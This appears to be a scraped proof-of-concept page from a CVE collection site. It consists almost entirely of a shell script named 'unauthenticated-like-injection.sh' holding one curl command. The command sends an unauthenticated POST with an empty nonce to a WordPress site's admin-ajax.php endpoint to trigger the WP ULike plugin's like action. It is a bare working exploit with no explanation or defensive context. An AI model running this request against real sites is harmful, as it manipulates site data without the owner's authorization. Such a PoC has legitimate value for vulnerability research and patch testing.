4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / unauthenticated-like-injection.sh SH
curl -X POST https://target-site.com/wp-admin/admin-ajax.php \
  -d "action=wp_ulike_process" \
  -d "method=likeThis" \
  -d "id=1" \
  -d "type=post" \
  -d "nonce=" \
  -H "Content-Type: application/x-www-form-urlencoded"